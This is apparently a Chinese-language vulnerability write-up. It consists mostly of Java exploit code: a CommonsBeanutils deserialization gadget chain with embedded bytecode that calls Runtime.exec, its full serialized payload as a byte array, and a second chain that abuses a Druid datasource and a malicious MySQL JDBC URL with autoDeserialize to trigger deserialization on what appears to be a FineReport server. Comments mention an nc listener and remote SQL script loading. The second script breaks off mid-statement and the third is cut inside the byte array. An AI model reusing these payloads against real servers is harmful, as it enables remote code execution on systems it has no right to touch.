漏洞已提交,厂商已修复
某软件存在 CommonsBeanutils(CB)反序列化利用链,先生成 CB 链的序列化字节数组:
package org.example;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;
import org.apache.commons.beanutils.BeanComparator;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Arrays;
import java.util.PriorityQueue;
/**
 * Builds a CommonsBeanutils (CB1-style) deserialization gadget chain and then
 * deserializes it locally to confirm it fires.
 *
 * Chain as exercised by this file (see the comments in {@link #main}):
 * PriorityQueue.readObject -> BeanComparator.compare -> TemplatesImpl.getOutputProperties
 * -> defineTransletClasses, which defines the embedded class bytes.
 *
 * Defender's view: the chain only works because the receiving side calls
 * ObjectInputStream.readObject() on untrusted bytes with commons-beanutils on the
 * classpath. Not deserializing untrusted input, or installing a JEP 290
 * ObjectInputFilter that rejects BeanComparator / TemplatesImpl, breaks every step
 * below regardless of the embedded bytecode.
 */
public class Main implements Serializable {
/**
 * Reflectively overwrites a declared (possibly private/final) field of {@code obj}.
 *
 * Note: getDeclaredField only searches obj's own class, not its superclasses, so
 * every field written by this file must be declared directly on the runtime class.
 *
 * @param obj       target instance
 * @param fieldName exact declared field name
 * @param value     new value (no type check beyond Field.set's own)
 * @throws Exception NoSuchFieldException / IllegalAccessException from reflection
 */
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
field.set(obj, value);
}
/**
 * Creates a TemplatesImpl carrying a malicious class. The original author's note:
 * "create the malicious class, pop a calculator".
 *
 * The Base64 blob below is a compiled class file (magic "yv66vg" = 0xCAFEBABE);
 * the decoded constant pool visible in the printed byte array further down the page
 * references java/lang/Runtime, getRuntime, exec and the string "calc".
 *
 * Note: this uses the JDK-internal xerces Base64 helper; java.util.Base64 is the
 * supported public equivalent and would decode the same input.
 *
 * @return a TemplatesImpl whose transformation will define the embedded class
 * @throws Exception propagated from reflection in newTemplatesWithClassBytes
 */
public static TemplatesImpl generateTemplates() throws Exception {
byte[] code = Base64.decode("yv66vgAAADMANAoACAAkCgAlACYIACcKACUAKAcAKQoABQAqBwArBwAsAQAGPGluaXQ+AQADKClW\n" +
"AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABJM\n" +
"b3JnL2V4YW1wbGUvQ2FsYzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxh\n" +
"bi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3Nl\n" +
"cmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29y\n" +
"Zy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3Vu\n" +
"L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7\n" +
"AQAKRXhjZXB0aW9ucwcALQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hz\n" +
"bHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJh\n" +
"dG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXph\n" +
"dGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVy\n" +
"bmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUv\n" +
"eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4B\n" +
"AAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAKQEAClNvdXJjZUZp\n" +
"bGUBAAlDYWxjLmphdmEMAAkACgcALgwALwAwAQAEY2FsYwwAMQAyAQATamF2YS9pby9JT0V4Y2Vw\n" +
"dGlvbgwAMwAKAQAQb3JnL2V4YW1wbGUvQ2FsYwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9p\n" +
"bnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFj\n" +
"aGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVu\n" +
"dGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZh\n" +
"L2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlACEABwAI\n" +
"AAAAAAAEAAEACQAKAAEACwAAAC8AAQABAAAABSq3AAGxAAAAAgAMAAAABgABAAAACwANAAAADAAB\n" +
"AAAABQAOAA8AAAABABAAEQACAAsAAAA/AAAAAwAAAAGxAAAAAgAMAAAABgABAAAAFgANAAAAIAAD\n" +
"AAAAAQAOAA8AAAAAAAEAEgATAAEAAAABABQAFQACABYAAAAEAAEAFwABABAAGAACAAsAAABJAAAA\n" +
"BAAAAAGxAAAAAgAMAAAABgABAAAAGQANAAAAKgAEAAAAAQAOAA8AAAAAAAEAEgATAAEAAAABABkA\n" +
"GgACAAAAAQAbABwAAwAWAAAABAABABcACAAdAAoAAQALAAAAYQACAAEAAAASuAACEgO2AARXpwAI\n" +
"Syq2AAaxAAEAAAAJAAwABQADAAwAAAAWAAUAAAAOAAkAEQAMAA8ADQAQABEAEgANAAAADAABAA0A\n" +
"BAAeAB8AAAAgAAAABwACTAcAIQQAAQAiAAAAAgAj");
return newTemplatesWithClassBytes(code);
}
/**
 * Populates the private TemplatesImpl fields so that the class bytes are accepted
 * and defined when the templates are later used (original note: "set the conditions
 * so the bytecode loads normally").
 *
 * @param classBytes one complete class file
 * @return the prepared TemplatesImpl
 * @throws Exception propagated from reflection
 */
private static TemplatesImpl newTemplatesWithClassBytes(byte[] classBytes) throws Exception {
// Class.newInstance() is deprecated since Java 9; getDeclaredConstructor().newInstance() is the replacement.
TemplatesImpl templates = TemplatesImpl.class.newInstance();
setFieldValue(templates, "_bytecodes", new byte[][]{classBytes});
// Preconditions for reaching defineTransletClasses(): a non-null _name, no cached _class,
// and a transformer factory to hand out a class loader.
setFieldValue(templates, "_name", "name" + System.nanoTime());
setFieldValue(templates, "_class", null);
setFieldValue(templates, "_tfactory", new TransformerFactoryImpl());
return templates;
}
/**
 * Serializes the gadget chain into a byte array.
 *
 * Structure: a PriorityQueue whose comparator is a BeanComparator with
 * property = "outputProperties" and whose backing array holds two copies of the
 * prepared TemplatesImpl. On readObject the queue re-heapifies, which calls
 * compare(), which reads the bean property and thereby invokes
 * TemplatesImpl.getOutputProperties().
 *
 * @return Java-serialization bytes of the queue
 * @throws Exception propagated from reflection or serialization
 */
public static byte[] getPayload() throws Exception {
// The prepared TemplatesImpl instance from above.
TemplatesImpl obj = generateTemplates();
// Comparator; a null property makes the two add() calls below harmless.
// CASE_INSENSITIVE_ORDER is chosen because it is itself Serializable.
final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
// Installing BeanComparator as the PriorityQueue comparator is what makes
// BeanComparator.compare() run during the queue's readObject().
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
// Two elements so size == 2 and heapify actually performs a comparison on read.
queue.add("1");
queue.add("1");
// Switch the property to "outputProperties" only now, after the adds, so that
// PropertyUtils.getProperty resolves to TemplatesImpl.getOutputProperties() at deserialization time.
setFieldValue(comparator, "property", "outputProperties");
// Replace the backing array with two TemplatesImpl references so the first argument
// handed to PropertyUtils.getProperty is the TemplatesImpl.
setFieldValue(queue, "queue", new Object[]{obj, obj});
// Serialize. (A try-with-resources around the ObjectOutputStream would close it on
// the error path as well; behaviour on the success path is unchanged.)
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(queue);
oos.close();
return barr.toByteArray();
}
/**
 * Generates the payload, prints it as a Java byte-array literal, and deserializes
 * it in-process to verify the chain.
 *
 * @param args unused
 * @throws Exception propagated from getPayload() / readObject()
 */
public static void main(String[] args) throws Exception {
byte[] payload = getPayload();
// Print the serialized bytes (this is the byte[] literal reproduced further down the page).
System.out.println(Arrays.toString(payload));
// Local deserialization: an unfiltered ObjectInputStream, i.e. exactly the sink a
// JEP 290 ObjectInputFilter or a deserialization-free API would protect.
ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(payload));
// readObject() runs PriorityQueue.readObject -> BeanComparator.compare ->
// TemplatesImpl.getOutputProperties -> defineTransletClasses, which defines the
// embedded class bytes.
ois.readObject();
}
}
//输出结果:byte[] bytes = new byte[]{-84, -19, 0, 5, 115, 114, 0, 23, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 80, 114, 105, 111, 114, 105, 116, 121, 81, 117, 101, 117, 101, -108, -38, 48, -76, -5, 63, -126, -79, 3, 0, 2, 73, 0, 4, 115, 105, 122, 101, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 59, 120, 112, 0, 0, 0, 2, 115, 114, 0, 43, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 99, 111, 109, 109, 111, 110, 115, 46, 98, 101, 97, 110, 117, 116, 105, 108, 115, 46, 66, 101, 97, 110, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, -29, -95, -120, -22, 115, 34, -92, 72, 2, 0, 2, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 113, 0, 126, 0, 1, 76, 0, 8, 112, 114, 111, 112, 101, 114, 116, 121, 116, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 120, 112, 115, 114, 0, 42, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 83, 116, 114, 105, 110, 103, 36, 67, 97, 115, 101, 73, 110, 115, 101, 110, 115, 105, 116, 105, 118, 101, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 119, 3, 92, 125, 92, 80, -27, -50, 2, 0, 0, 120, 112, 116, 0, 16, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 119, 4, 0, 0, 0, 3, 115, 114, 0, 58, 99, 111, 109, 46, 115, 117, 110, 46, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 120, 97, 108, 97, 110, 46, 105, 110, 116, 101, 114, 110, 97, 108, 46, 120, 115, 108, 116, 99, 46, 116, 114, 97, 120, 46, 84, 101, 109, 112, 108, 97, 116, 101, 115, 73, 109, 112, 108, 9, 87, 79, -63, 110, -84, -85, 51, 3, 0, 6, 73, 0, 13, 95, 105, 110, 100, 101, 110, 116, 78, 117, 109, 98, 101, 114, 73, 0, 14, 95, 116, 114, 97, 110, 115, 108, 101, 116, 73, 110, 100, 101, 120, 91, 0, 10, 95, 98, 121, 116, 101, 99, 111, 100, 101, 115, 116, 0, 3, 91, 91, 66, 91, 0, 6, 95, 99, 108, 97, 115, 115, 116, 0, 18, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 
115, 115, 59, 76, 0, 5, 95, 110, 97, 109, 101, 113, 0, 126, 0, 4, 76, 0, 17, 95, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 59, 120, 112, 0, 0, 0, 0, -1, -1, -1, -1, 117, 114, 0, 3, 91, 91, 66, 75, -3, 25, 21, 103, 103, -37, 55, 2, 0, 0, 120, 112, 0, 0, 0, 1, 117, 114, 0, 2, 91, 66, -84, -13, 23, -8, 6, 8, 84, -32, 2, 0, 0, 120, 112, 0, 0, 5, -24, -54, -2, -70, -66, 0, 0, 0, 51, 0, 52, 10, 0, 8, 0, 36, 10, 0, 37, 0, 38, 8, 0, 39, 10, 0, 37, 0, 40, 7, 0, 41, 10, 0, 5, 0, 42, 7, 0, 43, 7, 0, 44, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 18, 76, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 59, 1, 0, 9, 116, 114, 97, 110, 115, 102, 111, 114, 109, 1, 0, 114, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 100, 111, 99, 117, 109, 101, 110, 116, 1, 0, 45, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 1, 0, 8, 104, 97, 110, 100, 108, 101, 114, 115, 1, 0, 66, 91, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 
97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 10, 69, 120, 99, 101, 112, 116, 105, 111, 110, 115, 7, 0, 45, 1, 0, -90, 40, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 68, 79, 77, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 41, 86, 1, 0, 8, 105, 116, 101, 114, 97, 116, 111, 114, 1, 0, 53, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 100, 116, 109, 47, 68, 84, 77, 65, 120, 105, 115, 73, 116, 101, 114, 97, 116, 111, 114, 59, 1, 0, 7, 104, 97, 110, 100, 108, 101, 114, 1, 0, 65, 76, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 109, 108, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 115, 101, 114, 105, 97, 108, 105, 122, 101, 114, 47, 83, 101, 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 97, 110, 100, 108, 101, 114, 59, 1, 0, 8, 60, 99, 108, 105, 110, 105, 116, 62, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 41, 1, 0, 
10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 1, 0, 9, 67, 97, 108, 99, 46, 106, 97, 118, 97, 12, 0, 9, 0, 10, 7, 0, 46, 12, 0, 47, 0, 48, 1, 0, 4, 99, 97, 108, 99, 12, 0, 49, 0, 50, 1, 0, 19, 106, 97, 118, 97, 47, 105, 111, 47, 73, 79, 69, 120, 99, 101, 112, 116, 105, 111, 110, 12, 0, 51, 0, 10, 1, 0, 16, 111, 114, 103, 47, 101, 120, 97, 109, 112, 108, 101, 47, 67, 97, 108, 99, 1, 0, 64, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 114, 117, 110, 116, 105, 109, 101, 47, 65, 98, 115, 116, 114, 97, 99, 116, 84, 114, 97, 110, 115, 108, 101, 116, 1, 0, 57, 99, 111, 109, 47, 115, 117, 110, 47, 111, 114, 103, 47, 97, 112, 97, 99, 104, 101, 47, 120, 97, 108, 97, 110, 47, 105, 110, 116, 101, 114, 110, 97, 108, 47, 120, 115, 108, 116, 99, 47, 84, 114, 97, 110, 115, 108, 101, 116, 69, 120, 99, 101, 112, 116, 105, 111, 110, 1, 0, 17, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 1, 0, 10, 103, 101, 116, 82, 117, 110, 116, 105, 109, 101, 1, 0, 21, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 82, 117, 110, 116, 105, 109, 101, 59, 1, 0, 4, 101, 120, 101, 99, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 15, 112, 114, 105, 110, 116, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 0, 33, 0, 7, 0, 8, 0, 0, 0, 0, 0, 4, 0, 1, 0, 9, 0, 10, 0, 1, 0, 11, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 11, 0, 13, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 14, 0, 15, 0, 0, 0, 1, 0, 16, 0, 17, 0, 2, 0, 11, 0, 0, 0, 63, 0, 0, 0, 3, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 22, 0, 13, 0, 0, 0, 32, 0, 3, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 20, 0, 21, 0, 2, 
0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 1, 0, 16, 0, 24, 0, 2, 0, 11, 0, 0, 0, 73, 0, 0, 0, 4, 0, 0, 0, 1, -79, 0, 0, 0, 2, 0, 12, 0, 0, 0, 6, 0, 1, 0, 0, 0, 25, 0, 13, 0, 0, 0, 42, 0, 4, 0, 0, 0, 1, 0, 14, 0, 15, 0, 0, 0, 0, 0, 1, 0, 18, 0, 19, 0, 1, 0, 0, 0, 1, 0, 25, 0, 26, 0, 2, 0, 0, 0, 1, 0, 27, 0, 28, 0, 3, 0, 22, 0, 0, 0, 4, 0, 1, 0, 23, 0, 8, 0, 29, 0, 10, 0, 1, 0, 11, 0, 0, 0, 97, 0, 2, 0, 1, 0, 0, 0, 18, -72, 0, 2, 18, 3, -74, 0, 4, 87, -89, 0, 8, 75, 42, -74, 0, 6, -79, 0, 1, 0, 0, 0, 9, 0, 12, 0, 5, 0, 3, 0, 12, 0, 0, 0, 22, 0, 5, 0, 0, 0, 14, 0, 9, 0, 17, 0, 12, 0, 15, 0, 13, 0, 16, 0, 17, 0, 18, 0, 13, 0, 0, 0, 12, 0, 1, 0, 13, 0, 4, 0, 30, 0, 31, 0, 0, 0, 32, 0, 0, 0, 7, 0, 2, 76, 7, 0, 33, 4, 0, 1, 0, 34, 0, 0, 0, 2, 0, 35, 112, 116, 0, 18, 110, 97, 109, 101, 53, 53, 48, 54, 57, 49, 56, 53, 51, 56, 52, 55, 48, 48, 112, 119, 1, 0, 120, 113, 0, 126, 0, 13, 120};
以下脚本生成 Base64 编码(而非加密)的序列化数据:服务器先对其反序列化,随后再经由 MySQL 驱动组件触发第二次反序列化。
package org.example;
import com.fr.json.revise.EncodeException;
import com.fr.serialization.JDKSerializer;
import com.fr.third.alibaba.druid.pool.DruidAbstractDataSource;
import com.fr.third.alibaba.druid.pool.DruidDataSource;
import com.fr.third.alibaba.druid.pool.xa.DruidXADataSource;
import com.fasterxml.jackson.databind.node.POJONode;
import com.fr.third.fasterxml.jackson.databind.ObjectMapper;
import com.fr.third.fasterxml.jackson.databind.SerializationFeature;
import javassist.*;
import org.apache.commons.collections4.FunctorException;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import javax.swing.UIDefaults;
import javax.management.BadAttributeValueExpException;
import com.fr.json.JSONArray;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.Signature;
import java.security.SignedObject;
import java.util.*;
import java.util.zip.GZIPInputStream;
import java.util.zip.GZIPOutputStream;
public class Main {
public static void main(String[] args) throws NullPointerException, NotSerializableException, EncodeException, IllegalAccessException, NoSuchFieldException, NotFoundException, CannotCompileException, IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException {
//Test test = new Test();
//User user = new User(test, "qqq");
DruidXADataSource druidXADataSource = new DruidXADataSource();
List> list_3 = new ArrayList<>(Arrays.asList(druidXADataSource));
//JSONArray jsonArray_3 = new JSONArray(druidXADataSource);
//new ObjectMapper().disable(SerializationFeature.FAIL_ON_EMPTY_BEANS);
List> list_1 = new ArrayList<>(Arrays.asList(list_3));
List> list_2 = new ArrayList<>(Arrays.asList("1"));
JSONArray jsonArray_1 = new JSONArray(list_1);
JSONArray jsonArray_2 = new JSONArray(list_2);
UIDefaults uiDefaults = new UIDefaults();
Class clazz = Class.forName("javax.swing.UIDefaults$TextAndMnemonicHashMap");
Constructor> t_constructor = clazz.getDeclaredConstructor();
t_constructor.setAccessible(true);
Object textAndMnemonicHashMap_1 = t_constructor.newInstance();
Object textAndMnemonicHashMap_2 = t_constructor.newInstance();
Method putmethod = clazz.getSuperclass().getDeclaredMethod("put", Object.class, Object.class);
putmethod.setAccessible(true);
putmethod.invoke(textAndMnemonicHashMap_1, jsonArray_1, 1);
putmethod.invoke(textAndMnemonicHashMap_2, jsonArray_2, jsonArray_2);
//HashSet set = new LinkedHashSet();
//set.add(jsonArray_1);
//set.add(jsonArray_2);
//使用一个无害的InvokerTransformer
//InvokerTransformer transformer_1 = new InvokerTransformer("toString", null, null);
//TransformingComparator transformingComparator_1 = new TransformingComparator(transformer_1);
//TreeMap treeMap_1 = new TreeMap<>(transformingComparator_1);
//treeMap_1.put(textAndMnemonicHashMap_1, jsonArray_1);
//TreeMap treeMap_2 = new TreeMap<>(transformingComparator_1);
//treeMap_2.put(textAndMnemonicHashMap_1, jsonArray_2);
Field statLogger = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("statLogger");
statLogger.setAccessible(true);
statLogger.set(druidXADataSource, null);
Field transactionHistogram = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("transactionHistogram");
transactionHistogram.setAccessible(true);
transactionHistogram.set(druidXADataSource, null);
Field logWriter = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("logWriter");
logWriter.setAccessible(true);
logWriter.set(druidXADataSource, null);
Field initedLatch = DruidXADataSource.class.getSuperclass().getDeclaredField("initedLatch");
initedLatch.setAccessible(true);
initedLatch.set(druidXADataSource, null);
Field initialSize = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("initialSize");
initialSize.setAccessible(true);
initialSize.set(druidXADataSource, 1);
Field driverClass = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("driverClass");
driverClass.setAccessible(true);
driverClass.set(druidXADataSource, "com.mysql.jdbc.Driver");
Field username = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("username");
username.setAccessible(true);
username.set(druidXADataSource, "root");
Field password = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("password");
password.setAccessible(true);
password.set(druidXADataSource, "root");
//Field driverClass = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("driverClass");
//driverClass.setAccessible(true);
//driverClass.set(druidXADataSource, "javax.naming.InitialContext");
Field jdbcUrl = DruidXADataSource.class.getSuperclass().getSuperclass().getDeclaredField("jdbcUrl");
jdbcUrl.setAccessible(true);
//nc.exe -lvvp 6666 查看System.getProperty方法调取对应的value
//jdbcUrl.set(druidXADataSource, "jdbc:hsqldb:http://127.0.0.1:6666/?${user.dir}");
//jdbcUrl.set(druidXADataSource, "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8888/sql.sql'");
jdbcUrl.set(druidXADataSource, "jdbc:mysql://127.0.0.1:3306/mysql?characterEncoding=utf8&useSSL=false&characterEncoding=utf8&useSSL=false&maxAllowedPacket=655360&allowLoadLocalInfile=true&autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&user=yso_C3P0_calc");
Hashtable
将 CB 链字节数组转换为十六进制字符串(供 MySQL 组件反序列化时使用)。
package org.example;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Arrays;
import java.util.Base64;
import java.util.Comparator;
import java.util.PriorityQueue;
public class Main implements Serializable {
public static void main(String[] args) throws Exception {
byte[] bytes = new byte[]{-84, -19, 0, 5, 115, 114, 0, 23, 106, 97, 118, 97, 46, 117, 116, 105, 108, 46, 80, 114, 105, 111, 114, 105, 116, 121, 81, 117, 101, 117, 101, -108, -38, 48, -76, -5, 63, -126, -79, 3, 0, 2, 73, 0, 4, 115, 105, 122, 101, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 116, 0, 22, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 59, 120, 112, 0, 0, 0, 2, 115, 114, 0, 43, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 99, 111, 109, 109, 111, 110, 115, 46, 98, 101, 97, 110, 117, 116, 105, 108, 115, 46, 66, 101, 97, 110, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, -29, -95, -120, -22, 115, 34, -92, 72, 2, 0, 2, 76, 0, 10, 99, 111, 109, 112, 97, 114, 97, 116, 111, 114, 113, 0, 126, 0, 1, 76, 0, 8, 112, 114, 111, 112, 101, 114, 116, 121, 116, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 120, 112, 115, 114, 0, 42, 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 83, 116, 114, 105, 110, 103, 36, 67, 97, 115, 101, 73, 110, 115, 101, 110, 115, 105, 116, 105, 118, 101, 67, 111, 109, 112, 97, 114, 97, 116, 111, 114, 119, 3, 92, 125, 92, 80, -27, -50, 2, 0, 0, 120, 112, 116, 0, 16, 111, 117, 116, 112, 117, 116, 80, 114, 111, 112, 101, 114, 116, 105, 101, 115, 119, 4, 0, 0, 0, 3, 115, 114, 0, 58, 99, 111, 109, 46, 115, 117, 110, 46, 111, 114, 103, 46, 97, 112, 97, 99, 104, 101, 46, 120, 97, 108, 97, 110, 46, 105, 110, 116, 101, 114, 110, 97, 108, 46, 120, 115, 108, 116, 99, 46, 116, 114, 97, 120, 46, 84, 101, 109, 112, 108, 97, 116, 101, 115, 73, 109, 112, 108, 9, 87, 79, -63, 110, -84, -85, 51, 3, 0, 6, 73, 0, 13, 95, 105, 110, 100, 101, 110, 116, 78, 117, 109, 98, 101, 114, 73, 0, 14, 95, 